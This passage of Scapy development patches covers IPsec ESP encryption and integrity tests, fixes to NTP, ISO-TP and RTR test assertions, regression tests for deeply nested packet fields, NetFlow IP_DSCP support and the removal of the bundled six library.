replay-oseq-hi 0x1 \ +# mode tunnel aead 'rfc4543(gcm(aes))' '0x3136627974656b65792b34627974656e6f6e6365' 128 flag align4 esn +ref = IP() \ + / ESP(spi=0x222, + data=b'\x43\xe6\xa1\xce\x70\x9d\x67\xf4\x45\x00\x00\x54\x2e\x4a\x40\x00' + b'\x40\x01\xf7\x62\x0a\x7d\x00\x02\x0a\x7d\x00\x01\x08\x00\xd3\x32' + b'\x8f\x4c\x00\x02\x8d\xec\x09\x64\x00\x00\x00\x00\x3c\x5b\x03\x00' + b'\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b' + b'\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b' + b'\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x01\x02\x02\x04' + b'\x76\xd4\x93\x90\x75\xee\x3f\xa3\xf3\xcf\xcc\x27\xf5\x5b\x12\xb6', + seq=5) + +d_ref = sa.decrypt(ref) +d_ref + +* Check for ICMP layer in decrypted reference +assert d_ref.haslayer(ICMP) + + +####################################### + += IPv4 / ESP - Transport - AES-NULL-GMAC - NULL - altered packet + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= TCP(sport=45012, dport=80) +p /= Raw('testdata') +p = IP(raw(p)) +p + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='AES-NULL-GMAC', crypt_key=b'16bytekey+4bytenonce', + auth_algo='NULL', auth_key=None) + +e = sa.encrypt(p) +e + +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +* AES-NULL-GMAC is integrity only, the original packet payload should be readable +assert b'testdata' in e[ESP].data + +* simulate the alteration of the packet before decryption +e[ESP].seq += 1 + +* integrity verification should fail +try: + d = sa.decrypt(e) + assert False +except IPSecIntegrityError as err: + err + +####################################### + += IPv4 / ESP - Transport - AES-NULL-GMAC - NULL - altered packet -- ESN + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= TCP(sport=45012, dport=80) +p /= Raw('testdata') +p = IP(raw(p)) +p + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='AES-NULL-GMAC', crypt_key=b'16bytekey+4bytenonce', + auth_algo='NULL', auth_key=None, esn_en = True, esn = 0x200) + +e = sa.encrypt(p) +e + +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +* AES-NULL-GMAC is integrity only, the original packet payload should be readable +assert b'testdata' in e[ESP].data + +* simulate the alteration of the packet before decryption +* integrity verification should fail +try: + d = sa.decrypt(e, esn = 0x201) + assert False +except IPSecIntegrityError as err: + err + ####################################### = IPv4 / ESP - Transport - AES-CCM - NULL ~ crypto_advanced From 6ed050eed036dd07de16036106e200541da96b80 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 25 Mar 2023 12:34:08 +0000 Subject: [PATCH 0998/1632] Correct several assertions in the NTP test Fixes: ``` >>> assert (pkt_1.precision.val == precision, pkt_1.precision.val) Traceback (most recent call last): File "/usr/lib64/python3.11/codeop.py", line 153, in __call__ return _maybe_compile(self.compiler, source, filename, symbol) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib64/python3.11/codeop.py", line 73, in _maybe_compile return compiler(source, filename, symbol) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib64/python3.11/codeop.py", line 118, in __call__ codeob = compile(source, filename, symbol, self.flags, True) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "", line 2 SyntaxError: assertion is always true, perhaps remove parentheses? ``` --- test/scapy/layers/ntp.uts | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index 8290d170199..cef5f7ed163 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -1128,11 +1128,11 @@ assert (isinstance(pkt_1.orig, RawVal)), type(pkt_1.orig) assert (isinstance(pkt_1.sent, RawVal)), type(pkt_1.sent) assert (isinstance(pkt_1.recv, RawVal)), type(pkt_1.recv) -assert (pkt_1.precision.val == precision, pkt_1.precision.val) -assert (pkt_1.dispersion.val == dispersion, pkt_1.dispersion.val) -assert (pkt_1.orig.val == time_stamp, pkt_1.orig.val) -assert (pkt_1.sent.val == time_stamp, pkt_1.sent.val) -assert (pkt_1.recv.val == time_stamp, pkt_1.recv.val) +assert pkt_1.precision.val == precision, pkt_1.precision.val +assert pkt_1.dispersion.val == dispersion, pkt_1.dispersion.val +assert pkt_1.orig.val == time_stamp, pkt_1.orig.val +assert pkt_1.sent.val == time_stamp, pkt_1.sent.val +assert pkt_1.recv.val == time_stamp, pkt_1.recv.val time_stamp_hex = 0x00000000e67d6774 pkt_2 = NTP( From 55cc32cc89a293e5947bef620eca342935a12866 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 25 Mar 2023 18:31:41 +0000 Subject: [PATCH 0999/1632] Use the daemon attribute instead of setDaemon setDaemon was deprecated in https://github.com/python/cpython/pull/25174 Fixes: ``` >>> test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1") Traceback (most recent call last): File "", line 2, in File "", line 9, in test_tls_server File "/usr/lib64/python3.11/threading.py", line 1240, in setDaemon warnings.warn('setDaemon() is deprecated, set the daemon attribute instead', DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead ``` --- test/tls/tests_tls_netaccess.uts | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index c7c7729fda2..e44f321afe8 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -145,8 +145,7 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=No q_ = Queue() th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "psk": psk}, - name="test_tls_server %s %s" % (suite, version)) - th_.setDaemon(True) + name="test_tls_server %s %s" % (suite, version), daemon=True) th_.start() # Synchronise threads q_.get() @@ -254,8 +253,7 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "handle_session_ticket": sess_in_out}, - name="test_tls_client %s %s" % (suite, version)) - th_.setDaemon(True) + name="test_tls_client %s %s" % (suite, version), daemon=True) th_.start() # Synchronise threads print("Syncrhonising...") From 3a30962ea72130b505aa7000a09d6a5daa6bea55 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 31 Mar 2023 02:05:17 +0300 Subject: [PATCH 1000/1632] Fix syntax errors (#3960) * Use "==" instead of "is" to compare numbers * Fix syntax errors in the RTR test --- test/contrib/isotp_message_builder.uts | 38 +++++++++++++------------- test/contrib/isotp_soft_socket.uts | 4 +-- test/contrib/rtr.uts | 4 +-- 3 files changed, 23 insertions(+), 23 deletions(-) diff --git a/test/contrib/isotp_message_builder.uts b/test/contrib/isotp_message_builder.uts index 27a67bb90a2..12a5a86e167 100644 --- a/test/contrib/isotp_message_builder.uts +++ b/test/contrib/isotp_message_builder.uts @@ -83,7 +83,7 @@ m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("E2 04 01 02 03 04"))) msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xE2 +assert msg.rx_ext_address == 0xE2 assert msg.data == dhex("01 02 03 04") = Single CAN frame that has 2 valid interpretations @@ -113,9 +113,9 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xEA +assert msg.rx_ext_address == 0xEA assert msg.tx_id == 0x641 -assert msg.ext_address is 0xEA +assert msg.ext_address == 0xEA assert msg.time == 1005 assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") @@ -132,9 +132,9 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xEA +assert msg.rx_ext_address == 0xEA assert msg.tx_id == 0x641 -assert msg.ext_address is 0xAE +assert msg.ext_address == 0xAE assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") = Verify that an EA starting with 1 will still work @@ -146,9 +146,9 @@ m.feed(CAN(identifier=0x241, data=dhex("1A 22 0C 0D 0E 0F 10 11"))) m.feed(CAN(identifier=0x241, data=dhex("1A 23 12 13 14 15 16 17"))) msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0x1A +assert msg.rx_ext_address == 0x1A assert msg.tx_id == 0x641 -assert msg.ext_address is 0x1A +assert msg.ext_address == 0x1A assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14") = Verify that an EA of 07 will still work @@ -158,9 +158,9 @@ m.feed(CAN(identifier=0x641, data=dhex("07 30 03 00" ))) m.feed(CAN(identifier=0x241, data=dhex("07 21 06 07 08 09 0A 0B"))) msg = m.pop(0x241, 0x07) assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0x07 +assert msg.rx_ext_address == 0x07 assert msg.tx_id == 0x641 -assert msg.ext_address is 0x07 +assert msg.ext_address == 0x07 assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A") = Verify that three interleaved messages can be sniffed simultaneously on the same identifier and extended address (very unrealistic) @@ -187,21 +187,21 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) # end of message A msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xEA +assert msg.rx_ext_address == 0xEA assert msg.data == dhex("A6 A7 A8") assert msg.time == 200 msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xEA +assert msg.rx_ext_address == 0xEA assert msg.tx_id == 0x641 -assert msg.ext_address is 0xEA +assert msg.ext_address == 0xEA assert msg.time == 400 assert msg.data == dhex("31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40") msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xEA +assert msg.rx_ext_address == 0xEA assert msg.tx_id == 0x641 -assert msg.ext_address is 0xEA +assert msg.ext_address == 0xEA assert msg.time == 300 assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") @@ -221,9 +221,9 @@ msgs = [ m.feed(msgs) msg = m.pop() assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xEA +assert msg.rx_ext_address == 0xEA assert msg.tx_id == 0x641 -assert msg.ext_address is 0xEA +assert msg.ext_address == 0xEA assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") = Verify multiple frames with EA from list and iterator @@ -248,9 +248,9 @@ isotpmsgs = [x for x in m] assert len(isotpmsgs) == 3 msg = isotpmsgs[0] assert msg.rx_id == 0x241 -assert msg.rx_ext_address is 0xEA +assert msg.rx_ext_address == 0xEA assert msg.tx_id == 0x641 -assert msg.ext_address is 0xEA +assert msg.ext_address == 0xEA assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") assert isotpmsgs[1] == isotpmsgs[2] @@ -260,4 +260,4 @@ m = ISOTPMessageBuilder(basecls=Raw) m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) msg = m.pop() assert msg.load == dhex("AB CD EF 04") -assert type(msg) == Raw \ No newline at end of file +assert type(msg) == Raw diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index fb333685041..f8db678152c 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -59,9 +59,9 @@ with TestSocket(CAN) as s, TestSocket(CAN) as tx_sock: assert sniffed[0]['ISOTP'].data == bytearray(range(1, 0x29)) assert sniffed[0]['ISOTP'].tx_id == 0x641 -assert sniffed[0]['ISOTP'].ext_address is 0xEA +assert sniffed[0]['ISOTP'].ext_address == 0xEA assert sniffed[0]['ISOTP'].rx_id == 0x241 -assert sniffed[0]['ISOTP'].rx_ext_address is 0xEA +assert sniffed[0]['ISOTP'].rx_ext_address == 0xEA + ISOTPSoftSocket tests diff --git a/test/contrib/rtr.uts b/test/contrib/rtr.uts index 55af4e275fd..0ec0d4e4812 100644 --- a/test/contrib/rtr.uts +++ b/test/contrib/rtr.uts @@ -230,9 +230,9 @@ RTRErrorReport in pkt and pkt.error_code == 0 and pkt.erroneous_PDU == b'' and p = filled values build pkt = IP()/TCP(dport=323)/RTRErrorReport(error_code=1, error_text='Internal Error') -RTRErrorReport in pkt and pkt.error_code == 1and pkt.error_text == b'Internal Error' +RTRErrorReport in pkt and pkt.error_code == 1 and pkt.error_text == b'Internal Error' = dissection pkt = IP(b'E\x00\x00F\x00\x01\x00\x00@\x06|\xaf\x7f\x00\x00\x01\x7f\x00\x00\x01 Z\x01C\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xdc\x15\x00\x00\x00\n\x00\x01\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x0eInternal Error') -RTRErrorReport in pkt and pkt.error_code == 1and pkt.error_text == b'Internal Error' +RTRErrorReport in pkt and pkt.error_code == 1 and pkt.error_text == b'Internal Error' From 4aaed1d0a423ad8e9da571d4c1b1d105b84823a8 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 9 Mar 2023 12:20:38 +0100 Subject: [PATCH 1001/1632] Fix nested ListFields --- scapy/packet.py | 24 +++++++++++++++++++++--- test/fields.uts | 28 ++++++++++++++++++++++++++++ test/scapy/layers/dhcp6.uts | 5 +++++ 3 files changed, 54 insertions(+), 3 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 47114f1b969..a8844ff7e7b 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -638,6 +638,22 @@ def copy_fields_dict(self, fields): return {fname: self.copy_field_value(fname, fval) for fname, fval in six.iteritems(fields)} + def _raw_packet_cache_field_value(self, fld, val, copy=False): + # type: (AnyField, Any, bool) -> Optional[Any] + """Get a value representative of a mutable field to detect changes""" + _cpy = lambda x: fld.do_copy(x) if copy else x # type: Callable[[Any], Any] + if fld.holds_packets: + # avoid copying whole packets (perf: #GH3894) + if fld.islist: + return [ + _cpy(x.fields) for x in val + ] + else: + return _cpy(val.fields) + elif fld.islist or fld.ismutable: + return _cpy(val) + return None + def clear_cache(self): # type: () -> None """Clear the raw packet cache for the field and all its subfields""" @@ -661,7 +677,8 @@ def self_build(self): """ if self.raw_packet_cache is not None: for fname, fval in six.iteritems(self.raw_packet_cache_fields): - if self.getfieldval(fname) != fval: + fld, val = self.getfield_and_val(fname) + if self._raw_packet_cache_field_value(fld, val) != fval: self.raw_packet_cache = None self.raw_packet_cache_fields = None self.wirelen = None @@ -987,8 +1004,9 @@ def do_dissect(self, s): continue # We need to track fields with mutable values to discard # .raw_packet_cache when needed. - if f.islist or f.holds_packets or f.ismutable: - self.raw_packet_cache_fields[f.name] = f.do_copy(fval) + if (f.islist or f.holds_packets or f.ismutable) and fval is not None: + self.raw_packet_cache_fields[f.name] = \ + self._raw_packet_cache_field_value(f, fval, copy=True) self.fields[f.name] = fval self.raw_packet_cache = _raw[:-len(s)] if s else _raw self.explicit = 1 diff --git a/test/fields.uts b/test/fields.uts index 193787aa0c4..6c62a7dfacf 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -758,6 +758,34 @@ assert p.data[3].data == 0xc102 assert isinstance(p.payload, conf.raw_layer) assert p.payload.load == b'toto' += Test nested PacketListFields +~ field +# Note: having packets that look like this is a terrible idea, and will perform +# very badly. However we must ensure we don't freeze because of it. + +# https://github.com/secdev/scapy/issues/3894 + +class GuessPayload(Packet): + @classmethod + def dispatch_hook(cls, *args, **kargs): + return TestNestedPLF + +class TestNestedPLF(Packet): + fields_desc = [ + ByteField('b', 0), + PacketListField('pl', [], GuessPayload) + ] + +p = TestNestedPLF(b'\x01' * 100) + +# check +i = 1 +while p.pl: + p = p.pl[0] + p.show() + i += 1 + +assert i == 100 ############ ############ diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index 4ae3549891b..b076df7d9b3 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -1167,6 +1167,11 @@ raw(DHCP6OptRelaySuppliedOpt(relaysupplied=DHCP6OptERPDomain(erpdomain=["toto.ex a = DHCP6OptRelaySuppliedOpt(b'\x00B\x00\x16\x00A\x00\x12\x04toto\x07example\x03com\x00') a.optcode == 66 and a.optlen == 22 and len(a.relaysupplied) == 1 and isinstance(a.relaysupplied[0], DHCP6OptERPDomain) and a.relaysupplied[0].erpdomain[0] == "toto.example.com." += DHCP6OptRelaySuppliedOpt - deeply nested DHCP6OptRelaySuppliedOpt +# https://github.com/secdev/scapy/issues/3894 + +p = DHCP6(b'\x01\x00\x00\x00' + b'\x00B\x0f\x0f' * 100) +assert p.getlayer(DHCP6OptRelaySuppliedOpt, 100) ############ ############ From cb619e534d6684c86fd2e00a90ce2b69a8f77ef1 Mon Sep 17 00:00:00 2001 From: Gabriel Ganne Date: Tue, 4 Apr 2023 14:14:31 +0200 Subject: [PATCH 1002/1632] netflow - add IP_DSCP support DSCP is a one-byte field just like TOS, and is already listed in the list of possible values in the template (NetflowV910TemplateFieldTypes), this just adds it to the list of possible values. Signed-off-by: Gabriel Ganne --- scapy/layers/netflow.py | 2 ++ test/scapy/layers/netflow.uts | 27 +++++++++++++++++++++++++++ 2 files changed, 29 insertions(+) diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 0b79923d217..0ce79dd4a91 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -1092,6 +1092,7 @@ class NetflowRecordV5(Packet): 77: 3, 78: 3, 79: 3, + 195: 1, } # NetflowV9 Ready-made fields @@ -1202,6 +1203,7 @@ def __init__(self, name, default, *args, **kargs): 160: (N9UTCTimeField, [True]), # systemInitTimeMilliseconds 161: (N9SecondsIntField, [True]), # flowDurationMilliseconds 162: (N9SecondsIntField, [False, True]), # flowDurationMicroseconds + 195: XByteField, # IP_DSCP 211: IPField, # collectorIPv4Address 212: IP6Field, # collectorIPv6Address 225: IPField, # postNATSourceIPv4Address diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts index 50c3c6823c4..5ad94a68feb 100644 --- a/test/scapy/layers/netflow.uts +++ b/test/scapy/layers/netflow.uts @@ -456,3 +456,30 @@ records = dissected_packets[3][NetflowDataflowsetV9].records assert len(records) == 24 assert records[0].IPV4_SRC_ADDR == '20.0.1.174' assert records[0].IPV4_NEXT_HOP == '10.100.103.1' + +# test for netflow IP_DSCP (id=195) +dscp_flowset = NetflowFlowsetV9( + templates=[ + NetflowTemplateV9( + template_fields=[ + NetflowTemplateFieldV9(fieldType=195), + ], + templateID=273, + ) + ], + flowSetID=2, +) + +recordClass = GetNetflowRecordV9(dscp_flowset, templateID=273) + +dscp_dataset = NetflowDataflowsetV9( + templateID=273, + records=[ + recordClass( + IP_DSCP=42, + ), + ], +) + +# record is generated with 2 zero bytes of padding +assert(raw(dscp_dataset) == b'\x01\x11\x00\x08\x2a\x00\x00\x00') From 42115bf5493e6dd11630692f384a76d4475d1ba6 Mon Sep 17 00:00:00 2001 From: Pierre Date: Sat, 8 Apr 2023 20:20:27 +0200 Subject: [PATCH 1003/1632] Drop six library (third & last batch) (#3857) * Drop six library (third & last batch) * Fix tiny mistake * Lots and lots of types fixes (+ upg 2 mypy 1.1.1) --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- .config/mypy/mypy.ini | 2 +- .config/mypy/mypy_check.py | 3 +- .github/workflows/unittests.yml | 2 +- CONTRIBUTING.md | 10 +- scapy/ansmachine.py | 9 +- scapy/arch/libpcap.py | 4 +- scapy/arch/windows/__init__.py | 8 +- scapy/asn1/asn1.py | 7 +- scapy/asn1/ber.py | 3 +- scapy/asn1fields.py | 26 +- scapy/asn1packet.py | 5 +- scapy/automaton.py | 15 +- scapy/autorun.py | 2 +- scapy/base_classes.py | 59 +- scapy/compat.py | 33 +- scapy/contrib/automotive/ecu.py | 1 - scapy/contrib/automotive/scanner/executor.py | 4 +- .../automotive/scanner/staged_test_case.py | 2 +- scapy/contrib/isotp/isotp_packet.py | 4 +- scapy/contrib/isotp/isotp_scanner.py | 2 +- scapy/contrib/isotp/isotp_utils.py | 8 +- scapy/dadict.py | 14 +- scapy/data.py | 4 +- scapy/error.py | 13 - scapy/fields.py | 107 +- scapy/interfaces.py | 20 +- scapy/layers/all.py | 8 +- scapy/layers/bluetooth.py | 8 +- scapy/layers/can.py | 5 +- scapy/layers/dcerpc.py | 5 +- scapy/layers/dhcp.py | 7 +- scapy/layers/dhcp6.py | 7 +- scapy/layers/dns.py | 3 +- scapy/layers/inet.py | 16 +- scapy/layers/inet6.py | 9 +- scapy/layers/ipsec.py | 7 +- scapy/layers/l2.py | 23 +- scapy/layers/lltd.py | 5 +- scapy/layers/ntp.py | 3 +- scapy/layers/ppp.py | 5 +- scapy/layers/tls/automaton_cli.py | 7 +- scapy/layers/tls/basefields.py | 7 +- scapy/layers/tls/cert.py | 9 +- scapy/layers/tls/crypto/cipher_aead.py | 13 +- scapy/layers/tls/crypto/cipher_block.py | 7 +- scapy/layers/tls/crypto/cipher_stream.py | 7 +- scapy/layers/tls/crypto/compression.py | 3 +- scapy/layers/tls/crypto/groups.py | 9 +- scapy/layers/tls/crypto/h_mac.py | 3 +- scapy/layers/tls/crypto/hash.py | 4 +- scapy/layers/tls/crypto/kx_algs.py | 3 +- scapy/layers/tls/crypto/pkcs1.py | 9 +- scapy/layers/tls/crypto/suites.py | 3 +- scapy/layers/tls/handshake.py | 3 +- scapy/layers/tls/keyexchange_tls13.py | 13 +- scapy/layers/tls/record.py | 3 +- scapy/layers/tls/session.py | 5 +- scapy/layers/tuntap.py | 9 +- scapy/libs/six.py | 999 ------------------ scapy/main.py | 45 +- scapy/modules/krack/crypto.py | 3 +- scapy/modules/nmap.py | 6 +- scapy/modules/p0f.py | 5 +- scapy/modules/p0fv2.py | 3 +- scapy/packet.py | 151 +-- scapy/pipetool.py | 12 +- scapy/plist.py | 35 +- scapy/scapypipes.py | 14 +- scapy/sendrecv.py | 39 +- scapy/sessions.py | 12 +- scapy/supersocket.py | 40 +- scapy/tools/UTscapy.py | 1 + scapy/tools/automotive/isotpscanner.py | 3 +- scapy/tools/automotive/obdscanner.py | 3 +- scapy/utils.py | 151 +-- scapy/volatile.py | 38 +- test/contrib/automotive/interface_mockup.py | 33 +- .../contrib/automotive/scanner/enumerator.uts | 6 +- .../automotive/scanner/uds_scanner.uts | 2 +- test/contrib/isotp_message_builder.uts | 5 +- test/contrib/isotp_native_socket.uts | 5 +- test/contrib/isotp_packet.uts | 5 +- test/contrib/isotp_soft_socket.uts | 6 +- test/contrib/pfcp.uts | 2 +- test/contrib/pnio_rpc.uts | 3 +- test/fields.uts | 8 +- test/linux.uts | 22 +- test/random.uts | 25 +- test/regression.uts | 36 +- test/scapy/layers/inet.uts | 2 +- test/scapy/layers/inet6.uts | 4 +- test/scapy/layers/lltd.uts | 4 +- test/tls/tests_tls_netaccess.uts | 2 - tox.ini | 5 +- 94 files changed, 618 insertions(+), 1712 deletions(-) delete mode 100644 scapy/libs/six.py diff --git a/.config/mypy/mypy.ini b/.config/mypy/mypy.ini index 6a04ecd04eb..ef0f74b2849 100644 --- a/.config/mypy/mypy.ini +++ b/.config/mypy/mypy.ini @@ -2,7 +2,7 @@ # Internal Scapy modules that we ignore -[mypy-scapy.libs.six,scapy.libs.six.moves,scapy.libs.winpcapy] +[mypy-scapy.libs.winpcapy] ignore_errors = True ignore_missing_imports = True diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index 58d878df8d6..5db49a4a0c3 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -101,6 +101,7 @@ x not in { # Disabled on Windows "scapy/arch/linux.py", + "scapy/arch/unix.py", "scapy/arch/solaris.py", "scapy/contrib/cansocket_native.py", "scapy/contrib/isotp/isotp_native_socket.py", @@ -115,4 +116,4 @@ os.path.abspath(f) for f in FILES ] -mypy_main(None, sys.stdout, sys.stderr, ARGS) +mypy_main(args=ARGS) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index ddd0961335b..7c83984ea06 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -52,7 +52,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: "3.10" + python-version: "3.11" - name: Install tox run: pip install tox - name: Run mypy diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index c1a159a5a5a..885b84fa249 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -64,9 +64,9 @@ of function calls, packet creations, etc.). is a nice read! - Avoid creating unnecessary `list` objects, particularly if they - can be huge (e.g., when possible, use `scapy.modules.six.range()` instead of - `range()`, `for line in fdesc` instead of `for line in - fdesc.readlines()`; more generally prefer generators over lists). + can be huge (e.g., when possible, use `for line in fdesc` instead of + `for line in fdesc.readlines()`; more generally prefer generators over + lists). ### Tests @@ -146,15 +146,11 @@ The project aims to provide code that works both on Python 2 and Python 3. There - lambdas must be written using a single argument when using tuples: use `lambda x, y: x + f(y)` instead of `lambda (x, y): x + f(y)`. - use int instead of long - use list comprehension instead of map() and filter() -- use scapy.modules.six.moves.range instead of xrange and range -- use scapy.modules.six.itervalues(dict) instead of dict.values() or dict.itervalues() -- use scapy.modules.six.string_types instead of basestring - `__bool__ = __nonzero__` must be used when declaring `__nonzero__` methods - `__next__ = next` must be used when declaring `next` methods in iterators - `StopIteration` must NOT be used in generators (but it can still be used in iterators) - `io.BytesIO` must be used instead of `StringIO` when using bytes - `__cmp__` must not be used. -- UserDict should be imported via `six.UserDict` ### Code review diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index d465cf3902f..9400197fc90 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -11,6 +11,7 @@ # Answering machines # ######################## +import abc import functools import socket import warnings @@ -30,14 +31,13 @@ Tuple, Type, TypeVar, - _Generic_metaclass, cast, ) _T = TypeVar("_T", Packet, PacketList) -class ReferenceAM(_Generic_metaclass): +class ReferenceAM(type): def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] @@ -142,9 +142,10 @@ def is_request(self, req): # type: (Packet) -> int return 1 + @abc.abstractmethod def make_reply(self, req): # type: (Packet) -> _T - return req + pass def send_reply(self, reply, send_function=None): # type: (_T, Optional[Callable[..., None]]) -> None @@ -268,4 +269,4 @@ def sniff(self): def make_reply(self, req, address=None): # type: (Packet, Optional[Any]) -> Packet - return super(AnsweringMachineTCP, self).make_reply(req) + return req diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index a879367f695..d19674ffd80 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -364,7 +364,7 @@ def next(self): float(self.header.contents.ts.tv_usec) / 1e6 ) pkt = bytes(bytearray( - self.pkt_data[:self.header.contents.len] # type: ignore + self.pkt_data[:self.header.contents.len] )) return ts, pkt __next__ = next @@ -502,7 +502,7 @@ def __init__(self, self.pcap_fd.setfilter(filter) def send(self, x): - # type: (int) -> NoReturn + # type: (Packet) -> NoReturn raise Scapy_Exception( "Can't send anything with L2pcapListenSocket" ) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 8f5bce3d9ab..0676cee6985 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -75,7 +75,7 @@ # hot-patching socket for missing variables on Windows if not hasattr(socket, 'IPPROTO_IPIP'): - socket.IPPROTO_IPIP = 4 + socket.IPPROTO_IPIP = 4 # type: ignore if not hasattr(socket, 'IP_RECVTTL'): socket.IP_RECVTTL = 12 # type: ignore if not hasattr(socket, 'IPV6_HDRINCL'): @@ -86,7 +86,7 @@ if not hasattr(socket, 'SOL_IPV6'): socket.SOL_IPV6 = socket.IPPROTO_IPV6 